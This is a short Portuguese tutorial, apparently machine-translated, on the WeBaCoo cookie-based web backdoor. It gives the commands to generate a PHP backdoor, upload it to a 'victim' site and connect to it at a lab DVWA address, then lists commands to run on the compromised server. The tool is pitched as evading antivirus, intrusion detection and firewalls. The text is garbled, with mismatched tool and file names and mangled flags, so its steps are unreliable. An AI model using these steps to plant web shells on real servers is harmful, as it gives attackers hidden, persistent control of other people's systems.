WeBaCoo (Web Backdoor Cookie) é um script do kit backdoor web, com o objetivo de fornecer uma conexão de terminal semelhante discrição sobre HTTP entre o cliente eo servidor web. É uma ferramenta de exploração pós capaz de manter o acesso a um servidor web comprometido. WeBaCoo foi projetado para operar sob o radar de moderno up-to-datado AV, NIDS, IPS, firewalls de rede e firewalls de aplicativos, provando um mecanismo furtiva para executar comandos do sistema para o servidor comprometido. A comunicação ofuscado é realizada utilizando campos de cookies do cabeçalho HTTP sob solicitações HTTP cliente válidos e respostas do servidor web relativa.
Abra o Terminal, digite o comando: webcoo.pl -g -o kali-linux.php
Isso irá gerar código para um backdoor (- g) Gerar código backdoor (- o é necessária). Aqui está uma imagem da vista terminal de comando: 
Agora fazer o upload de arquivos para o site webdoor.php vítima e prossiga para se conectar ao servidor com o seguinte comando:
webacoo.pl -t u http://10.0.0.88/dvwa/uploads/kali-linux.php
uname -a - imprimir todas as informações
livre - exibe informações sobre a memória livre e utilizada no sistema
pwd - imprimir o nome do diretório atual / de trabalho
df - exibe a quantidade de espaço em disco disponível no sistema de arquivos contendo cada argumento de nome de arquivo
W - Exibe informações sobre os usuários atualmente na máquina, e seus processos.
Load - código de máquina de carga e inicializar novos comandos.
Upload - upload de arquivos para servidor
Feito!
